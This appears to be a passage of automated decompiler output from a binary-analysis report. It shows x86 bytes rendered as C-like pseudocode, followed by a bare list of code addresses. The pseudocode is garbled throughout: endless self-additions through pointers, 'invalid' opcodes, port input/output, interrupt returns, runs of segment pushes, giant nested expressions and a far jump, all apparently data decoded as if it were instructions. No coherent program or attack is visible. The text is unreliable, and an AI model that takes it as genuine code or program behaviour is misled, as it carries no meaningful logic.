								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *_t180 =  *_t180 + _t180;
								 *((intOrPtr*)(_t474 + _t454 * 4)) =  *((intOrPtr*)(_t474 + _t454 * 4)) + _t454;
								 *_t180 =  *_t180 + _t180;
								asm("das");
								asm("scasd");
								 *_t180 =  *_t180 + _t180;
								_pop(ds);
								asm("lahf");
								 *_t180 =  *_t180 + _t180;
								asm("movq mm0, [eax]");
								 *_t474 =  *_t474 + _t460;
								asm("outsd");
								 *((intOrPtr*)(_t474 - 0x41)) =  *((intOrPtr*)(_t474 - 0x41)) + _t460;
								asm("out dx, eax");
								 *_t180 =  *_t180 + _t180;
								_t474 = _t474 - 1;
								asm("aam 0x0");
								if(_t474 < 0) {
									goto L22;
								}
								asm("popad");
								 *((intOrPtr*)(_t180 - 0x6c)) =  *((intOrPtr*)(_t180 - 0x6c)) + _t454;
								asm("popad");
								 *_t454 =  *_t454 + _t454;
								 *_t180 =  *_t180 + _t180;
								_pop(ds);
								asm("lahf");
								 *_t180 =  *_t180 + _t180;
								_pop(ds);
								asm("lahf");
								 *_t180 =  *_t180 + _t180;
								asm("das");
								asm("scasd");
								 *_t180 =  *_t180 + _t180;
								_pop(ds);
								_pop( *__eax);
								 *_t474 =  *_t474 + _t454;
								_pop( *__eax);
								if( *_t474 < 0) {
									continue;
								}
								asm("popad");
								 *((intOrPtr*)(_t180 - 0x6c)) =  *((intOrPtr*)(_t180 - 0x6c)) + _t454;
								do {
									asm("popad");
									 *_t454 =  *_t454 + _t454;
									 *_t474 =  *_t474 + _t460;
									_pop(_t475);
									asm("iretd");
									 *_t475 =  *_t475 + _t460;
									_pop(_t476);
									asm("iretd");
									 *_t476 =  *_t476 + _t454;
									asm("outsd");
									asm("fild word [eax]");
									asm("adc al, 0x3f");
									 *0xef9f4f00 =  *0xef9f4f00 + _t454;
									asm("invalid");
									 *0xFFFFFFFFEF9F4EBF =  *((intOrPtr*)(0xffffffffef9f4ebf)) + _t460;
									asm("outsd");
									_t474 = 0xcf8f008e;
									asm("out dx, eax");
									 *0xFFFFFFFFCF8F004D =  *((intOrPtr*)(0xffffffffcf8f004d)) + _t460;
									asm("out dx, eax");
									 *((intOrPtr*)(0xffffffffcf8f004d)) =  *((intOrPtr*)(0xffffffffcf8f004d)) + _t460;
									asm("out dx, eax");
									 *0xFFFFFFFFCF8FF05D =  *((intOrPtr*)(0xffffffffcf8ff05d)) + _t460;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *((intOrPtr*)(_t180 - 0x6c)) =  *((intOrPtr*)(_t180 - 0x6c)) + _t454;
									asm("popad");
									 *((intOrPtr*)(_t180 - 0x6c)) =  *((intOrPtr*)(_t180 - 0x6c)) + _t454;
									asm("popad");
									 *((intOrPtr*)(_t491 + _t180 * 8)) =  *((intOrPtr*)(_t491 + _t180 * 8)) + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
									 *_t180 =  *_t180 + _t180;
								} while ( *_t180 < 0);
								asm("popad");
								 *((intOrPtr*)(_t180 - 0x6c)) =  *((intOrPtr*)(_t180 - 0x6c)) + _t454;
								_t182 = _t180;
								asm("in al, dx");
								if (_t182 >= 0) goto L30;
								 *_t182 =  *_t182 + _t182;
								 *_t182 =  *_t182 + _t182;
								 *_t182 =  *_t182 + _t182;
								_t183 = _t182;
								 *_t183 =  *_t183 + _t183;
								 *((intOrPtr*)(_t490 - 0x60e10000)) =  *((intOrPtr*)(_t490 - 0x60e10000)) + _t183;
								 *0xcf8f008e =  *0xcf8f008e + _t460;
								_pop(_t478);
								asm("iretd");
								 *_t183 =  *_t183 + _t183;
								_pop(ds);
								asm("lahf");
								 *((intOrPtr*)(0xffffffffcf8f004d)) =  *((intOrPtr*)(0xffffffffcf8f004d)) + _t460;
								asm("out dx, eax");
								 *0x0E8FF05D =  *((intOrPtr*)(0xe8ff05d)) + _t460;
								asm("invalid");
								 *0xcf8f008e =  *0xcf8f008e + _t454;
								_pop(ds);
								asm("outsd");
								asm("fild word [eax]");
								 *_t478 =  *_t478 + _t454;
								 *_t183 =  *_t183 + _t183;
								asm("movq [eax], mm0");
								 *0x9f1f0000 =  *0x9f1f0000 + _t460;
								asm("scasd");
								 *_t183 =  *_t183 + _t183;
								_pop(ds);
								asm("lahf");
								 *_t183 =  *_t183 + _t183;
								asm("maxps xmm0, [eax]");
								asm("sbb al, 0x7f");
								asm("fild word [eax]");
								asm("outsd");
								asm("out dx, eax");
								 *0xFFFFFFFFEE8FF0BE =  *((intOrPtr*)(0xffffffffee8ff0be)) + _t460;
								asm("outsd");
								asm("fild word [eax]");
								asm("maxps xmm1, xmm7");
								 *_t183 =  *_t183 + _t183;
								asm("aam 0xbf");
								 *0xcf8f00ef =  *0xcf8f00ef + _t460;
								_pop(_t481);
								asm("iretd");
								 *0xcf8f00ef =  *0xcf8f00ef + _t454;
								asm("invalid");
								 *0xcf8f00ef =  *0xcf8f00ef + _t454;
								asm("invalid");
								 *0xcf8f00ef =  *0xcf8f00ef + _t454;
								asm("invalid");
								 *((intOrPtr*)(0xffffffffcf8f00ae)) =  *((intOrPtr*)(0xffffffffcf8f00ae)) + _t460;
								asm("out dx, eax");
								 *0xFFFFFFFFCF8F008E =  *((intOrPtr*)(0xffffffffcf8f008e)) + _t460;
								asm("out dx, eax");
								 *((intOrPtr*)(0xffffffffcf8f008e)) =  *((intOrPtr*)(0xffffffffcf8f008e)) + _t460;
								asm("out dx, eax");
								 *((intOrPtr*)(0xffffffffcf8f00ae)) =  *((intOrPtr*)(_t481 - 0x41)) + _t460;
								asm("out dx, eax");
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								asm("adc al, 0x0");
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								es =  *_t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								 *_t183 =  *_t183 + _t183;
								asm("das");
								asm("scasd");
								 *_t183 =  *_t183 + _t183;
								_pop(ds);
								_pop( *__eax);
								asm("outsd");
								asm("out dx, eax");
								 *0xFFFFFFFFBFC4F0BE =  *((intOrPtr*)(0xffffffffbfc4f0be)) + _t460;
								 *_t183 =  *_t183 + _t183;
								_pop(ds);
								_pop( *__eax);
								 *((intOrPtr*)(0x7f0f0000 + _t454 * 4)) =  *((intOrPtr*)(0x7f0f0000 + _t454 * 4)) + _t460;
								 *((intOrPtr*)(_t490 + 0x6f)) =  *((intOrPtr*)(_t490 + 0x6f)) + _t454;
								asm("fild word [eax]");
								 *0x7F0EFFBF =  *((intOrPtr*)(0x7f0effbf)) + _t460;
								 *((intOrPtr*)(0x7f0f0000 + _t454)) =  *((intOrPtr*)(0x7f0f0000 + _t454)) + _t183;
								_pop( *__eax);
								 *((intOrPtr*)(_t490 - 0x3070ff41)) =  *((intOrPtr*)(_t490 - 0x3070ff41)) + _t183;
								while(1) {
									L32:
									asm("out dx, eax");
									 *0xEE0FEFCF =  *((intOrPtr*)(0xee0fefcf)) + _t460;
									do {
										asm("out dx, eax");
										 *((intOrPtr*)(0x7f0effbf)) =  *((intOrPtr*)(0x7f0effbf)) + _t460;
										asm("out dx, eax");
										 *((intOrPtr*)(0x7f0effbf)) =  *((intOrPtr*)(0x7f0effbf)) + _t460;
										asm("out dx, eax");
										 *0x7f0f0000 =  *0x7f0f0000 + _t454;
										asm("invalid");
										 *0x7f0f0000 =  *0x7f0f0000 + _t460;
										_pop(0x7f0f0000);
										asm("iretd");
										 *0x7f0f0000 =  *0x7f0f0000 + _t454;
										asm("outsd");
										asm("fild word [eax]");
										 *((intOrPtr*)(0x7f0effbf)) =  *((intOrPtr*)(0x7f0effbf)) + _t460;
										 *0x7f0f0000 =  *0x7f0f0000 + _t460;
										if( *0x7f0f0000 > 0) {
											goto L32;
										}
										 *0x7f0f0000 =  *0x7f0f0000 + _t460;
									} while ( *0x7f0f0000 > 0);
									 *((intOrPtr*)(0x7f0effbf)) =  *((intOrPtr*)(0x7f0effbf)) + _t460;
									asm("out dx, eax");
									 *0x7F0EFF9F =  *((intOrPtr*)(0x7f0eff9f)) + _t460;
									asm("out dx, eax");
									 *0x7f0f0000 =  *0x7f0f0000 + _t454;
									asm("invalid");
									asm("sbb al, 0x0");
									_t462 = _t461 + _t491;
									_t197 = _t183 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454;
									 *_t454 =  *_t454 + _t197;
									es =  *_t462;
									asm("les eax, [esp+eax]");
									_t485 = 0x7f0f0000 +  *((intOrPtr*)(_t490 + 3));
									_t272 = (_t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40 +  *((intOrPtr*)(_t454 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40)) +  *_t454 + 0x30 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40 +  *((intOrPtr*)(_t454 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40)) +  *_t454 + 0x30)) +  *_t454 +  *_t462 +  *_t454 + 0x2f +  *_t462 +  *_t462 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 | 0x00000003) +  *_t454 +  *_t454 +  *_t454 + 8 +  *((intOrPtr*)(_t490 + 0x2020202)) +  *((intOrPtr*)((_t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40 +  *((intOrPtr*)(_t454 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40)) +  *_t454 + 0x30 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40 +  *((intOrPtr*)(_t454 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462 +  *((intOrPtr*)(_t491 + _t197 +  *((intOrPtr*)(_t491 + _t197)) + 0x34 +  *_t454 +  *_t462)) + 0x40)) +  *_t454 + 0x30)) +  *_t454 +  *_t462 +  *_t454 + 0x2f +  *_t462 +  *_t462 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 +  *_t454 | 0x00000003) +  *_t454 +  *_t454 +  *_t454 + 8 +  *((intOrPtr*)(_t490 + 0x2020202)) + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t272;
									_t278 = _t272 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t272 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									asm("sbb al, 0x7");
									es = es;
									 *_t454 =  *_t454 | _t278;
									_t284 = _t278 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t278 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									asm("aam 0x6");
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t284;
									_t290 = _t284 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t284 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t290;
									_t296 = _t290 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t290 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6061405));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es =  *_t485;
									 *_t454 =  *_t454 | _t296;
									_t302 = _t296 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t296 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t302;
									_t308 = _t302 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t302 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									asm("les eax, [esi]");
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t308;
									_t315 = _t308 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t460 + _t491)) + 0x7d06;
									 *_t315 =  *_t315 + _t315;
									_push(es);
									_push(es);
									_push(es);
									_t316 = _t315 + 6;
									_push(es);
									_push(es);
									 *((intOrPtr*)(_t490 + 0x4030807)) =  *((intOrPtr*)(_t490 + 0x4030807)) + _t316;
									_t323 = _t316 + 7 +  *_t462 +  *_t462 +  *_t454 + 0x6060605;
									_push(es);
									_push(es);
									 *0x2543fe =  *0x2543fe + _t323;
									_push(es);
									 *0x2543fe =  *0x2543fe + _t323;
									_push(es);
									 *_t485 =  *_t485 + _t323;
									es = es;
									 *_t454 =  *_t454 | _t323;
									_t329 = _t323 + 8 +  *_t454 +  *_t462 +  *_t462 +  *((intOrPtr*)(_t323 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060005));
									_push(es);
									asm("sbb al, 0x6");
									 *0x2543fe =  *0x2543fe + _t329;
									_push(es);
									 *0x2543fe =  *0x2543fe + _t329;
									_push(es);
									 *_t485 =  *_t485 + _t329;
									es = es;
									 *_t454 =  *_t454 | _t329;
									_t463 = _t462 + _t491;
									_t335 = _t329 + 8 +  *_t454 +  *_t462 +  *_t462 + 0x6060005;
									_push(es);
									_push(es);
									_push(es);
									 *0x2543fe =  *0x2543fe + _t335;
									_push(es);
									 *0x2543fe =  *0x2543fe + _t335;
									_push(es);
									 *_t485 =  *_t485 + _t335;
									es = es;
									 *_t454 =  *_t454 | _t335;
									_t341 = _t335 + 8 +  *_t454 +  *_t463 +  *_t463 +  *((intOrPtr*)(_t335 + 8 +  *_t454 +  *_t463 +  *_t463 + 0x6060005));
									_push(es);
									_push(es);
									_push(es);
									 *0x2543fe =  *0x2543fe + _t341;
									_push(es);
									 *0x2543fe =  *0x2543fe + _t341;
									_push(es);
									 *_t485 =  *_t485 + _t341;
									es = es;
									 *_t454 =  *_t454 | _t341;
									_t343 = _t341 + 8;
									_t464 = _t463 +  *((intOrPtr*)(_t463 + _t343));
									_t347 = _t343 +  *_t464 +  *_t454 + 0x6060605;
									_push(es);
									es =  *_t347;
									_push(es);
									_push(es);
									 *0x2543fe =  *0x2543fe + _t347;
									_push(es);
									 *_t485 =  *_t485 + _t347;
									es = es;
									 *_t454 =  *_t454 | _t347;
									_t353 = _t347 + 8 +  *_t454 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t347 + 8 +  *_t454 +  *_t464 +  *_t464 + 0x6060005));
									_push(es);
									 *0x2543fe =  *0x2543fe + _t353;
									 *0x2543fe =  *0x2543fe + _t353;
									 *_t353 =  *_t353 + _t353;
									 *0x2543fe =  *0x2543fe + _t353;
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t353;
									_t359 = _t353 + 8 +  *_t454 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t353 + 8 +  *_t454 +  *_t464 +  *_t464 + 0x606c405));
									_push(es);
									_push(es);
									_push(es);
									 *0x2543fe =  *0x2543fe + _t359;
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t359;
									_t362 = _t359 + 0x10 +  *_t454;
									if(_t362 < 0) {
										_t362 = _t362 +  *_t464;
									}
									_t363 = _t362 +  *((intOrPtr*)(_t362 + 0x6060405));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t363;
									_t369 = _t363 + 8 +  *_t454 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t363 + 8 +  *_t454 +  *_t464 +  *_t464 + 0x605));
									 *_t369 =  *_t369 + _t369;
									 *0x2543fe =  *0x2543fe + _t369;
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t454 =  *_t454 | _t369;
									_t373 = _t369 + 8 +  *_t454 +  *_t464;
									_t455 = _t454 +  *((intOrPtr*)(_t454 + _t373));
									_t375 = _t373 + 0x606060b;
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t455 =  *_t455 | _t375;
									asm("aam 0x4");
									_t380 = _t375 + 4 +  *_t455 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t375 + 4 +  *_t455 +  *_t464 +  *_t464 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t455 =  *_t455 | _t380;
									_t386 = _t380 + 8 +  *_t455 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t380 + 8 +  *_t455 +  *_t464 +  *_t464 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									asm("adc al, 0x7");
									 *_t455 =  *_t455 | _t386;
									_t391 = _t386 + 8 +  *_t455 +  *_t464 +  *_t464;
									es =  *((intOrPtr*)(_t391 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t455 =  *_t455 | _t391;
									_t397 = _t391 + 8 +  *_t455 +  *_t464 +  *_t464 +  *((intOrPtr*)(_t391 + 8 +  *_t455 +  *_t464 +  *_t464 + 0x6060605));
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									_push(es);
									es = es;
									es = es;
									 *_t455 =  *_t455 | _t397;
									_t428 = (_t397 + 8 + _t491 +  *_t464 +  *_t464 + 0x00000003 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 | 0x00000003) + 0xd +  *_t464 +  *((intOrPtr*)(_t490 + 0x2020202)) +  *_t464 +  *_t464 +  *_t464 +  *_t464 +  *_t464 +  *_t464 +  *_t464 +  *_t464 +  *_t455 + 7;
									 *_t455 =  *_t455 + _t428;
									_t441 = _t428 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *((intOrPtr*)(_t455 +  *((intOrPtr*)(_t455 + _t428 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455 +  *_t455))));
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									 *_t441 =  *_t441 + _t441;
									_t442 = _t441 + _t464;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *((intOrPtr*)(_t442 + 0x10000)) =  *((intOrPtr*)(_t442 + 0x10000)) + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *((intOrPtr*)(_t442 + _t442)) =  *((intOrPtr*)(_t442 + _t442)) + _t464;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									es =  *_t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *_t442 =  *_t442 + _t442;
									 *((char*)(_t442 + _t442)) =  *((char*)(_t442 + _t442));
									asm("invalid");
									goto [far dword [eax];
								}
							}
						}
					}
					asm("outsb");
					asm("outsb");
					if (_t496 < 0) goto L6;
					asm("sbb [ecx], eax");
					 *_t461 =  *_t461 + _t178;
					_t444 = _t178 &  *_t460;
					_t465 = _t465 &  *0x2543fe;
					_push(cs);
					 *_t444 =  *_t444 + _t444;
					asm("insb");
					if ( *_t444 == 0) goto L7;
					 *0x2543fe =  *0x2543fe + _t461;
					_push(cs);
					 *_t444 =  *_t444 + _t444;
					 *_t444 =  *_t444 + _t444;
					 *_t444 =  *_t444 + _t444;
					_t178 = _t444 +  *_t444;
					 *_t178 =  *_t178 & _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 | _t178;
					 *_t178 =  *_t178 + _t178;
					 *[es:eax] =  *[es:eax] + _t178;
					 *_t178 =  *_t178 + _t461;
					asm("adc [eax], al");
					 *_t460 =  *_t460 + _t178;
					 *_t178 = _t460 +  *_t178;
					 *((intOrPtr*)(_t178 + 5)) =  *((intOrPtr*)(_t178 + 5)) + _t460;
					 *_t178 =  *_t178 + _t178;
					asm("into");
					 *_t178 =  *_t178 | _t178;
					 *_t178 = _t460 +  *_t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 | _t178;
					 *_t178 =  *_t178 + _t178;
					 *_t178 =  *_t178 + _t178;
					 *((char*)(_t178 + _t178)) =  *((char*)(_t178 + _t178));
					 *_t178 =  *_t178 + _t178;
					goto L8;
				}
			}

0x0040120c
0x00401211
0x00401216
0x00401218
0x0040121a
0x0040121c
0x0040121e
0x00401220
0x00401221
0x00401223
0x00401225
0x00401227
0x0040122d
0x00401232
0x00401233
0x00401239
0x0040123b
0x0040123d
0x0040123f
0x00401241
0x00401244
0x00401245
0x00401246
0x00401249
0x0040124b
0x0040124d
0x00401251
0x00401255
0x00401257
0x00401259
0x0040125d
0x0040125e
0x00401267
0x00401268
0x00401269
0x0040126e
0x00401271
0x00401273
0x00401276
0x00401277
0x0040127b
0x00401280
0x00401282
0x00401283
0x00401285
0x00401286
0x00401288
0x0040128e
0x0040128f
0x00401295
0x00401297
0x00401299
0x0040129b
0x0040129d
0x0040129f
0x004012a1
0x004012a3
0x004012a5
0x004012a7
0x004012a9
0x004012ab
0x004012ad
0x004012af
0x004012b1
0x004012b3
0x004012b5
0x004012b7
0x004012b9
0x004012b9
0x004012ba
0x004012bb
0x004012bd
0x004012c3
0x0040132f
0x0040132f
0x00401331
0x00401333
0x00401335
0x00000000
0x004012c5
0x004012c5
0x004012c6
0x004012c7
0x004012c8
0x004012cf
0x004012d1
0x004012d1
0x004012d1
0x004012d4
0x00401337
0x00401337
0x00401339
0x0040133b
0x0040133d
0x0040133f
0x00401341
0x00401343
0x00401344
0x00401346
0x0040134b
0x0040134c
0x00401352
0x00401353
0x00401354
0x0040135a
0x0040135e
0x00401360
0x00401362
0x00401363
0x00401364
0x0040136a
0x0040136b
0x0040136c
0x0040136f
0x00401370
0x00401373
0x00401374
0x0040137a
0x0040137b
0x0040137c
0x00401382
0x00401384
0x00401386
0x00401388
0x0040138a
0x0040138c
0x0040138e
0x00401390
0x00401392
0x00401394
0x00401396
0x00401398
0x0040139a
0x0040139c
0x0040139e
0x004013a0
0x004013a2
0x004013a4
0x004013a5
0x004013a5
0x004013a7
0x004013a9
0x004013ab
0x004013ad
0x004013af
0x004013b1
0x004013b3
0x004013b5
0x004013b7
0x004013b9
0x004013bb
0x004013bd
0x004013bf
0x004013c1
0x004013c3
0x004013c4
0x004013c6
0x004013c9
0x004013cb
0x004013cc
0x004013ce
0x004013d1
0x004013d3
0x004013d5
0x004013d7
0x004013d8
0x004013da
0x004013db
0x004013dc
0x004013de
0x004013df
0x004013e0
0x004013e2
0x004013e3
0x004013e5
0x004013e7
